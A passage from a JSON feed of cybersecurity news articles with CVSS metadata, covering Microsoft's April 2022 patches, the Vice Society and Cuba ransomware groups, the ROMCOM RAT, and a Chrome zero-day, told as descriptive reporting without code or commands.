Common Log File System (CLFS). Credited with reporting the flaw are the U.S. 
National Security Agency (NSA) and CrowdStrike researchers Adam Podlosky and Amir Bazine.\n\nThe second publicly-known zero-day flaw ([CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>), CVSS score: 7.0) also concerns a case of privilege escalation in the Windows User Profile Service, successful exploitation of which \"requires an attacker to win a race condition.\"\n\nOther critical flaws to note include a number of remote code execution flaws in RPC Runtime Library ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>), CVSS score: 9.8), Windows Network File System ([CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>), CVSS scores: 9.8), Windows Server Service ([CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>)), Windows SMB ([CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>)), and Microsoft Dynamics 365 ([CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>)).\n\nMicrosoft also patched as many as 18 flaws in Windows DNS Server, one information disclosure flaw and 17 remote code execution flaws, all of which were reported by security researcher Yuki Chen. 
Also remediated are 15 privilege escalation flaws in the Windows Print Spooler component.\n\nThe patches arrive a week after the tech giant announced plans to make available a feature called [AutoPatch](<https://thehackernews.com/2022/04/microsofts-new-autopatch-feature-to.html>) in July 2022 that allows enterprises to expedite applying security fixes in a timely fashion while emphasizing on scalability and stability.\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, counting \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-04-01>)\n * [Apache Struts 2](<https://cwiki.apache.org/confluence/display/WW/S2-062>)\n * [Cisco Systems](<https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_11.html>)\n * [HP Teradici PCoIP Client](<https://support.hp.com/us-en/security-bulletins>)\n * [Juniper Networks](<https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=\\[Security%20Advisories\\]>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2022-April/thread.html>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * 
[SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T03:22:00", "type": "thn", "title": "Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26904"], "modified": "2022-04-13T03:22:09", "id": "THN:2A188AB3A1960F89715831B15A68311E", "href": 
"https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T14:51:13", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjyOiUSyrTGvh6ufFGvLkc3O1z4zyJOQVog8w48TWB67JBQqpFfZoIQlcw7w8cGW0ABfsJSdetJ-a7xoS28tfEkT29EdwdIbnSiLsA4VNJWy0rAW-4ekqEjVrNTW7mb_0OXoIb7yTIt7iES2uQe_Q3-mUTd_NhNEVN4TUo6KYl1Cn5s1N3wrhXN9FHD/s728-e100/ransomware.jpg>)\n\nA cybercrime group known as **Vice Society** has been linked to multiple ransomware strains in its malicious campaigns aimed at the education, government, and retail sectors.\n\nThe Microsoft Security Threat Intelligence team, which is tracking the threat cluster under the moniker DEV-0832, said the group avoids deploying ransomware in some cases and rather likely carries out extortion using exfiltrated stolen data.\n\n\"Shifting ransomware payloads over time from [BlackCat](<https://thehackernews.com/2022/09/blackcat-ransomware-attackers-spotted.html>), [Quantum Locker](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Zeppelin](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), DEV-0832's latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as .v-s0ciety, .v-society, and, most recently, .locked,\" the tech giant's cybersecurity division [said](<https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/>).\n\nVice Society, active since June 2021, has been steadily observed encrypting and exfiltrating victim data, and threatening companies with exposure of siphoned information to pressure them into paying a ransom.\n\n\"Unlike other RaaS (Ransomware-as-a-Service) double extortion groups, Vice Society focuses on getting into the victim system to deploy ransomware binaries sold on Dark web forums,\" cybersecurity company SEKOIA 
[said](<https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/>) in an analysis of the group in July 2022.\n\nThe financially motivated threat actor is known to rely on exploits for publicly disclosed vulnerabilities in internet-facing applications for initial access, while also using PowerShell scripts, repurposed legitimate tools, and commodity backdoors such as [SystemBC](<https://thehackernews.com/2020/12/ransomware-attackers-using-systembc.html>) prior to deploying the ransomware.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgnSYNgIGYh4RKJNWOt90zF3uAXZnv74Cd4rglNTW3jfh5Iaks75NZIlh8koQbP5sbAHi6Dezt7wpobiwvszy0bxZOZT-pVbIXv5E06u2sNZKlM8YWx8pJh9nO1bAdQzyT-EAUNu0ltiLC1emy1wKWLuxvSRDiAMYkc2u2zU7NNFg-t1QBRI9n_mMDA/s728-e100/Windows.jpg>)\n\nVice Society actors have also been spotted leveraging Cobalt Strike for lateral movement, in addition to creating scheduled tasks for persistence and abusing vulnerabilities in Windows Print Spooler (aka [PrintNightmare](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)) and Common Log File System ([CVE-2022-24521](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)) to escalate privileges.\n\n\"Vice Society actors attempt to evade detection through masquerading their malware and tools as legitimate files, using process injection, and likely use evasion techniques to defeat automated dynamic analysis,\" the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>) last month.\n\nIn one July 2022 incident disclosed by Microsoft, the threat actor is said to have attempted to initially deploy QuantumLocker executables, only to follow it up with suspected Zeppelin ransomware binaries five hours later.\n\n\"Such an incident might suggest that DEV-0832 maintains multiple ransomware payloads and switches depending on target defenses or, alternatively, that dispersed operators working under the DEV-0832 umbrella might maintain their own preferred ransomware payloads for distribution,\" Redmond pointed out.\n\nAmong other tools utilized by DEV-0832 is a Go-based backdoor called PortStarter that offers the capability to alter firewall settings and open ports to establish connections with pre-configured command-and-control (C2) servers.\n\nVice Society, aside from taking advantage of living-off-the-land binaries (LOLBins) to run malicious code, has also been found attempting to turn off Microsoft Defender Antivirus using registry commands.\n\nData exfiltration is eventually achieved by launching a PowerShell script that transmits wide-ranging sensitive information, ranging from financial documents to medical data, to a hard-coded attacker-owned IP address.\n\nRedmond further pointed out that the cybercrime group focuses on organizations with weaker security controls and a higher likelihood of a ransom payout, underscoring the need to [apply necessary safeguards](<https://www.cisa.gov/stopransomware/stopransomware>) to prevent such attacks.\n\n\"The shift from a ransomware as a service (RaaS) offering (BlackCat) to a purchased wholly-owned malware offering (Zeppelin) and a custom Vice Society variant indicates DEV-0832 has active ties in the cybercriminal economy and has been testing ransomware payload efficacy or post-ransomware extortion opportunities,\" Microsoft said.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-26T08:13:00", "type": "thn", "title": "Vice Society Hackers Are Behind Several Ransomware Attacks Against Education Sector", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-10-26T13:13:50", "id": "THN:3D23E7265CBC033DE214A1FFC7A5E648", "href": "https://thehackernews.com/2022/10/vice-society-hackers-are-behind-several.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-02T15:09:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg8tTIoIM0jQbURH5PDnsmJRHY_lsHAklLsSwnnCy4L7peXJqw9IBIpKPUPJkyvg7_m2_n7uzGNLygUAk9J5Dn1ZMtuO--1mRGpLx-qpO8G7CW-Gwx2PUYYtWv5OuALZiA0xTKhEua4hbOnjAEwvt7sqxbdY3BamBoL-I5UxsUNssvzOcfgQIAVuHC0/s728-e100/cuba-ransomware.png>)\n\nThe threat actors behind Cuba (aka COLDDRAW) ransomware have received more 
than $60 million in ransom payments and compromised over 100 entities across the world as of August 2022.\n\nIn a new advisory shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), the agencies [highlighted](<https://www.cisa.gov/uscert/ncas/current-activity/2022/12/01/stopransomware-cuba-ransomware>) a \"sharp increase in both the number of compromised U.S. entities and the ransom amounts.\"\n\nThe ransomware crew, also known as [Tropical Scorpius](<https://thehackernews.com/2022/08/hackers-behind-cuba-ransomware-attacks.html>), has been observed targeting financial services, government facilities, healthcare, critical manufacturing, and IT sectors, while simultaneously expanding its tactics to gain initial access and interact with breached networks.\n\nIt's worth noting that despite the name \"Cuba,\" there is no evidence to suggest that the actors have any connection or affiliation with the island country.\n\nThe entry point for the attacks involves the exploitation of known security flaws, phishing, compromised credentials, and legitimate remote desktop protocol (RDP) tools, followed by distributing the ransomware via [Hancitor](<https://blogs.blackberry.com/en/2021/07/threat-thursday-hancitor-malware>) (aka Chanitor).\n\nSome of the flaws incorporated by Cuba into its toolset are as follows -\n\n * [**CVE-2022-24521**](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) (CVSS score: 7.8) - An elevation of privilege vulnerability in Windows Common Log File System (CLFS) Driver\n * [**CVE-2020-1472**](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) (CVSS score: 10.0) - An elevation of privilege vulnerability in Netlogon remote protocol (aka ZeroLogon)\n\n\"In addition to deploying ransomware, the actors have used 'double extortion' techniques, in which they exfiltrate victim data, and (1) demand a ransom payment to decrypt it and, (2) 
threaten to publicly release it if a ransom payment is not made,\" CISA noted.\n\nCuba is also said to share links with the operators of RomCom RAT and another ransomware family called Industrial Spy, according to recent findings from BlackBerry and Palo Alto Networks Unit 42.\n\nThe RomCom RAT is [distributed](<https://thehackernews.com/2022/11/hackers-using-rogue-versions-of-keepass.html>) through trojanized versions of legitimate software such as SolarWinds Network Performance Monitor, KeePass, PDF Reader Pro, Advanced IP Scanner, pdfFiller, and Veeam Backup & Replication that are hosted on counterfeit lookalike websites.\n\nThe advisory from CISA and FBI is the latest in a series of alerts the agencies have issued about different ransomware strains such as [MedusaLocker](<https://www.cisa.gov/uscert/ncas/alerts/aa22-181a>), [Zeppelin](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), [Vice Society](<https://thehackernews.com/2022/10/vice-society-hackers-are-behind-several.html>), [Daixin Team](<https://thehackernews.com/2022/10/cisa-warns-of-daixin-team-hackers.html>), and [Hive](<https://thehackernews.com/2022/11/hive-ransomware-attackers-extorted-100.html>).\n\n \n\n\nFound this article interesting? 
Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-02T06:04:00", "type": "thn", "title": "Cuba Ransomware Extorted Over $60 Million in Ransom Fees from More than 100 Entities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2022-24521"], "modified": "2022-12-02T13:20:45", "id": "THN:2AE638B06506778A5F779054ACB99CDC", "href": "https://thehackernews.com/2022/12/cuba-ransomware-extorted-over-60.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-12T04:04:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjG5NY6z_E3mIqws1GTNFoFKEavt9jBxtciK10htSDSQc_JECqfwKvNTPymBW0axc6McWFzM08_t78ovmJx91jcYFgquWC09fNYVXBMKenTKS08JGIU8VnHvwXEcZdfG0DG9NePAIWwEZN0t1g7Ax2ZaG1fKl6W75RQWiD5ekyGBcApeB74SwA5osWN/s728-e100/ransomware.jpg>)\n\nThreat actors associated with the Cuba ransomware have been linked to previously undocumented tactics, 
techniques and procedures (TTPs), including a new remote access trojan called **ROMCOM RAT** on compromised systems.\n\nThe [new findings](<https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/>) come from Palo Alto Networks' Unit 42 threat intelligence team, which is tracking the double extortion ransomware group under the [constellation-themed moniker](<https://unit42.paloaltonetworks.com/unit-42-threat-group-naming-update/>) **Tropical Scorpius**.\n\nCuba ransomware (aka [COLDDRAW](<https://www.mandiant.com/resources/unc2596-cuba-ransomware>)), which was first detected in December 2019, reemerged on the threat landscape in November 2021 and has been attributed to attacks against 60 entities in five critical infrastructure sectors, amassing at least $43.9 million in ransom payments.\n\nOf the 60 victims listed on its data leak site, 40 are located in the U.S., indicating a not as global distribution of targeted organizations as other ransomware gangs.\n\n\"Cuba ransomware is distributed through Hancitor malware, a loader known for dropping or executing stealers, such as Remote Access Trojans (RATs) and other types of ransomware, onto victims' networks,\" according to a [December 2021 alert](<https://www.ic3.gov/Media/News/2021/211203-2.pdf>) from the U.S. 
Federal Bureau of Investigation (FBI).\n\n\"Hancitor malware actors use phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, or legitimate Remote Desktop Protocol (RDP) tools to gain initial access to a victim's network.\"\n\nIn the intervening months, the ransomware operation received substantial upgrades with an aim to \"optimize its execution, minimize unintended system behavior, and provide technical support to the ransomware victims if they choose to negotiate,\" [noted](<https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html>) Trend Micro in June.\n\nChief among the changes encompassed terminating more processes before encryption (viz Microsoft Outlook, Exchange, and MySQL), expanding the file types to be excluded, and revision to its ransom note to offer victim support via quTox.\n\nTropical Scorpius is also believed to share connections with a data extortion marketplace called Industrial Spy, as [reported](<https://www.bleepingcomputer.com/news/security/industrial-spy-data-extortion-market-gets-into-the-ransomware-game/>) by Bleeping Computer in May 2022, with the exfiltrated data following a Cuba ransomware attack posted for sale on the illicit portal instead of its own data leak site.\n\nThe latest updates observed by Unit 42 in May 2022 has to do with the defense evasion tactics employed prior to the deployment of the ransomware to fly under the radar and move laterally across the compromised IT environment.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhhaBChjsAYv4PpKZR25UQ3kDpGAHQ3G4qGVnXq8GGelhND5cDH3UxCWOv2uIEGmZtCmEIs7o_BMLcnlIByriCzFi43Pwsd9Ev2--mNQ8ieosDPxK156gZtGWhqJazdEVZXfbI5oJJsalpaeIG4ypHXkpAWog09JIppeF5_pNWu-zVY1niiteyZNblF/s728-e100/chart.jpg>)\n\n\"Tropical Scorpius leveraged a dropper that writes a kernel driver to the file system called ApcHelper.sys,\" the company stated. \"This targets and terminates security products. 
The dropper was not signed, however, the kernel driver was signed using the certificate found in the [LAPSUS$ NVIDIA leak](<https://thehackernews.com/2022/03/hackers-who-broke-into-nvidias-network.html>).\"\n\nThe main task of the kernel driver is to terminate processes associated with security products so as to bypass detection. Also incorporated in the attack chain is a local privilege escalation tool downloaded from a remote server to gain SYSTEM permissions. \n\nThis, in turn, is achieved by triggering an exploit for CVE-2022-24521 (CVSS score: 7.8), a flaw in the Windows Common Log File System (CLFS) that was [patched](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) by Microsoft as a zero-day flaw in April 2022.\n\nThe privilege escalation step is followed by carrying out system reconnaissance and lateral movement activities through tools like ADFind and Net Scan, while also using a ZeroLogon utility that exploits [CVE-2020-1472](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) to gain domain administrator rights.\n\nFurthermore, the intrusion paves the way for the deployment of a novel backdoor called ROMCOM RAT, which is equipped to start a reverse shell, delete arbitrary files, upload data to a remote server, and harvest a list of running processes.\n\nThe remote access trojan, per Unit 42, is said to be under active development, as the cybersecurity firm discovered a second sample uploaded to the VirusTotal database on June 20, 2022.\n\nThe improved variant comes with support for a broadened set of 22 commands, counting the ability to download bespoke payloads to capture screenshots as well as extract a list of all installed applications to send back to the remote server.\n\n\"Tropical Scorpius remains an active threat,\" the researchers said. 
\"The group's activity makes it clear that an approach to tradecraft using a hybrid of more nuanced tools focusing on low-level Windows internals for defense evasion and local privilege escalation can be highly effective during an intrusion.\"\n\nThe findings come as emerging ransomware groups such as [Stormous](<https://cloudsek.com/threatintelligence/stormous-ransomware-group-runs-opinion-polls-leaks-intellectual-property-of-indian-companies/>), [Vice Society](<https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/>), [Luna](<https://thehackernews.com/2022/07/new-rust-based-ransomware-family.html>), [SolidBit](<https://medium.com/s2wblog/two-copycats-of-lockbit-ransomware-solidbit-and-crypton-7257fb069b16>), and BlueSky are continuing to proliferate and evolve in the cybercrime ecosystem, at the same time using advanced encryption techniques and delivery mechanisms.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiMII7rTuz0-pkhQiKNG-tXibaA5dvIeKqjHYEPmsFQDciFG1K40Epz9E4XdSX3mAC1dqyP9wQ42bMnK9kJH0rHe6pPSfG8Z8s1Mwag8HuLMmwh7PcMF3j-sjdl-Xa4TSgUKn872EWArqVk5pQMtn_v7uFF-vdZMXYjcI4YrXgMtKGOEk66z1WFW8mS/s728-e100/ransomware-malware.jpg>)\n\nSolidBit particularly stands out for its targeting of users of popular video games and social media platforms by masquerading as different applications like League of Legends account checker, Social Hacker, and Instagram Follower Bot, allowing the actors to cast a wide net of potential victims.\n\n\"SolidBit ransomware is compiled using .NET and is actually a variant of [Yashma](<https://thehackernews.com/2022/05/new-chaos-ransomware-builder-variant.html>) ransomware, also known as Chaos,\" Trend Micro [disclosed](<https://www.trendmicro.com/en_us/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamer.html>) in a write-up last week.\n\n\"It's possible that SolidBit's ransomware actors are currently working with the original developer of Yashma ransomware and 
likely modified some features from the Chaos builder, later rebranding it as SolidBit.\"\n\nBlueSky, for its part, is known to utilize multithreading to encrypt files on the host for faster encryption, not to mention adopt anti-analysis techniques to obfuscate its appearance.\n\nThe ransomware payload, which kicks off with the execution of a PowerShell script retrieved from an attacker-controlled server, also disguises itself as a legitimate Windows application (\"javaw.exe\").\n\n\"Ransomware authors are adopting modern advanced techniques such as encoding and encrypting malicious samples, or using multi-staged ransomware delivery and loading, to evade security defenses,\" Unit 42 [noted](<https://unit42.paloaltonetworks.com/bluesky-ransomware/>).\n\n\"BlueSky ransomware is capable of encrypting files on victim hosts at rapid speeds with multithreaded computation. In addition, the ransomware adopts obfuscation techniques, such as API hashing, to slow down the reverse engineering process for the analyst.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-11T10:21:00", "type": "thn", "title": "Hackers Behind Cuba Ransomware Attacks Using New RAT Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2022-24521"], "modified": "2022-08-12T02:23:42", "id": "THN:D7DBE5ECBAF3E906ECA544B7E150594A", "href": "https://thehackernews.com/2022/08/hackers-behind-cuba-ransomware-attacks.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhe4kI4fPWEvYG9ia8i9jo4TGUExUqxfVYERYGlXDOHtolech2eDZ1t68Ygq-Rm2KyDOptmayUsQQ8KWRS6YLPsnNM81pe5p-m9VRQ3jW80R7QesFXZ6BrtdfsBk9_pvdaAJUbvRR8si8Ro0mR-XltTDsPJ-2gNPRTn6yVm8yNWyn9cPdTUYrX5TsGA/s728-e100/chrome-update.jpg>)\n\nGoogle on Friday shipped an out-of-band security update to address a 
high severity vulnerability in its Chrome browser that it said is being actively exploited in the wild.\n\nTracked as [**CVE-2022-1096**](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>), the zero-day flaw relates to a type confusion vulnerability in the V8 JavaScript engine. An anonymous researcher has been credited with reporting the bug on March 23, 2022.\n\nType confusion errors, which arise when a resource (e.g., a variable or an object) is accessed using a type that's incompatible with the one it was originally initialized with, could have serious consequences in languages that are not [memory safe](<https://en.wikipedia.org/wiki/Memory_safety>) like C and C++, enabling a malicious actor to perform out-of-bounds memory access.\n\n\"When a memory buffer is accessed using the wrong type, it could read or write memory out of the bounds of the buffer, if the allocated buffer is smaller than the type that the code is attempting to access, leading to a crash and possibly code execution,\" MITRE's Common Weakness Enumeration (CWE) [explains](<https://cwe.mitre.org/data/definitions/843.html>).\n\nThe tech giant acknowledged it's \"aware that an exploit for CVE-2022-1096 exists in the wild,\" but stopped short of sharing additional specifics so as to prevent further exploitation until a majority of users are updated with a fix.\n\nCVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year, the first being [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>), a use-after-free vulnerability in the Animation component that was patched on February 14, 2022.\n\nEarlier this week, Google's Threat Analysis Group (TAG) [disclosed](<https://thehackernews.com/2022/03/north-korean-hackers-exploited-chrome.html>) details of a twin campaign staged by North Korean nation-state groups that weaponized the flaw to strike U.S. 
based organizations spanning news media, IT, cryptocurrency, and fintech industries.\n\nGoogle Chrome users are highly recommended to update to the latest version 99.0.4844.84 for Windows, Mac, and Linux to mitigate any potential threats. Users of Chromium-based browsers such as Microsoft Edge, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-26T02:11:00", "type": "thn", "title": "Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096"], "modified": "2022-03-26T02:11:38", "id": "THN:EC6517AAC0BD5D8BBC4C4D32420CA903", "href": "https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html", "cvss": {"score": 
